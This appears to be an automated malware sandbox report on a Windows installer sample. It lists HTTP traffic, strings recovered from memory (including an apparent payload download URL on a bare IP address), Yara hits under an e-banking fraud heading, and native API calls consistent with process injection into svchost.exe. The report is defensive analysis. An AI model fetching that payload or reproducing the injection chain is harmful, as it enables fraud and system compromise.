              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 09:07:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 09:07:26 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 09:07:33 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dhbHECWAR1vHgoaHiFRcY0nqh5rC4RhAW3wIl2UTgcz3o6gCPLujunNBLYfGDW3BHSFED1sbjqEnyJWbX0r2yOEtQpMHWcjJ0dcqxk2JTSHR3JkcUvJTY9awsYvfBbmqUBBL%2B0OCx30o"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e9935543f778c2d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2057&min_rtt=2057&rtt_var=1028&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=785&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 09:07:36 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mdJsoZlbpx560DUzWwQ6dklk5igLwiq3S6rp%2B9CwTDCjyRU93S5q8hQtUXCDQ7DjK3SoU1VdggVgALrQtuQB%2FvbStfVxkZvT%2BxsqT0URJSt5IOsPRl5HoQNfnl1MY%2F12LcBZURL3qAMR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e9935659bfc7c93-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2074&min_rtt=2074&rtt_var=1037&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=809&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 09:07:38 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UFJosTQxsU%2BmrsVBTV5oOSQfHGQnvO7zdD4ntPc7OQEbEVcRWGZK4O%2BvoCMVraRsCGIPhFDiUUkMjVq7CboCG8vizCYV29w18yJgKcRtB7XRH3EwP%2BIXKPDDglt1ngA3Qc5DAowxCXJd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e993576ea7b4231-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=8626&min_rtt=8626&rtt_var=4313&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1822&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Nov 2024 09:07:41 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=scG9ux1sn6VSXw1I65F1ZZHsjkroTWcvII7CtSm4Fv05xceUvp6QKBGm%2BoRdmbVUcBZldxbMmDR4%2BncqWjmjbpyTCdUybRJ2qfofsMdzM1iZuZO9TjW4J1I85yDXW07D5S7nL2OtSdr%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e993587cd0042c8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1787&min_rtt=1787&rtt_var=893&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=520&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlDate: Thu, 28 Nov 2024 09:07:48 GMTServer: NetlifyX-Nf-Request-Id: 01JDS0DK4RZ8T2Z8343P1TSEBQConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlDate: Thu, 28 Nov 2024 09:07:51 GMTServer: NetlifyX-Nf-Request-Id: 01JDS0DNR2ACB1C4SHS4QGMYQYConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlDate: Thu, 28 Nov 2024 09:07:53 GMTServer: NetlifyX-Nf-Request-Id: 01JDS0DRECV0QCFB3VMWN6DWR9Connection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlDate: Thu, 28 Nov 2024 09:07:56 GMTServer: NetlifyX-Nf-Request-Id: 01JDS0DTXNT6WHCKFYNRXSQH0SConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Nov 2024 09:08:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: phl-web-03X-Frontend: phl-frontend-01X-Trace-Id: ti_5b4d2af7f47172ab0c7e3938fb93bc67Content-Encoding: br
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Nov 2024 09:08:09 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: phl-web-03X-Frontend: phl-frontend-01X-Trace-Id: ti_c275695ec835c24b79fdf1b98c0f041eContent-Encoding: br
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Nov 2024 09:08:12 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 544Connection: closex-backend: phl-web-03X-Frontend: phl-frontend-01X-Trace-Id: ti_0e1ea0d4fccdbcb1b40b9e304d7b0d5eData Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>
            Source: Stemmeurnes.exe, 00000006.00000002.3680894814.0000000006FB3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.162.149.63/kybqONxtMLpRGBHO51.bin
            Source: Stemmeurnes.exe, 00000006.00000002.3680894814.0000000006FB3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.162.149.63/kybqONxtMLpRGBHO51.bin_
            Source: Stemmeurnes.exe, 00000006.00000002.3680894814.0000000006FB3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.162.149.63/ta
            Source: powershell.exe, 00000002.00000002.3448936955.0000000002C26000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mid
            Source: svchost.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Salmebogs(1).exe, 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Salmebogs(1).exe, 00000000.00000000.2271359918.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Stemmeurnes.exe, 00000006.00000000.3447638821.000000000040A000.00000008.00000001.01000000.00000007.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000002.00000002.3452317093.0000000005AF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004A91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: Stemmeurnes.exe, 00000006.00000001.3448532289.00000000005F2000.00000020.00000001.01000000.00000008.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
            Source: Stemmeurnes.exe, 00000006.00000001.3448532289.00000000005F2000.00000020.00000001.01000000.00000008.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004A91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: powershell.exe, 00000002.00000002.3452317093.0000000005AF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000002.00000002.3452317093.0000000005AF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000002.00000002.3452317093.0000000005AF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.3452317093.0000000005AF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Code function: 0_2_004052CB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

            E-Banking Fraud

            Source: Yara match | File source: 00000008.00000002.4750377511.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3693581776.0000000022720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.4750102999.0000000001380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.4750333765.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3694238419.0000000022D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process Stats: CPU usage > 49%
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe | Code function: 6_2_22AA35C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe | Code function: 6_2_22AA2B60 NtClose,LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe | Code function: 6_2_22AA2C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe | Code function: 6_2_22AA2DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03474340 NtSetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03474650 NtSuspendThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034735C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472BE0 NtQueryValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472BF0 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472BA0 NtEnumerateValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472AD0 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472AF0 NtWriteFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034739B0 NtGetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472F30 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472FB0 NtResumeThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472EE0 NtQueueApcThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472E80 NtReadVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472D30 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472C60 NtCreateKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472CA0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03473010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03473090 NtSetValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03473D70 NtOpenThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03473D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03472CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00779230 NtCreateFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00779390 NtReadFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00779480 NtDeleteFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00779520 NtClose
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00779670 NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Code function: 0_2_0040327D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Code function: 0_2_00404B08
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe | Code function: 6_2_22A752A0
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe | Code function: 6_2_22B112ED
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Code function: 7_2_02FB4972
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Code function: 7_2_02FB4B10
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Code function: 7_2_02FB4B04
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Code function: 7_2_02FB69C0
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Code function: 7_2_02FBD1A0
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Code function: 7_2_02FD5690
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Code function: 7_2_02FB67A0
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Code function: 7_2_02FB6797
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Code function: 7_2_02FAAD22
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0342D34C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034F132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_035003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0348739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0347516C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0350B16B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03430100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034F81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0344B1B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_035001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034EF0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034F70E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034FF0E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03464750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034FF7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034F16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0345C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034F7571
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03500591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034DD5B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034F2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03431460
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034FF43F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034EE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034FFB76
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034F6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0347DBF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0345FB80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034FFA49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034F7A46
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034B3A6C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034EDAC6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034DDAAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03485AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03449950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0345B950
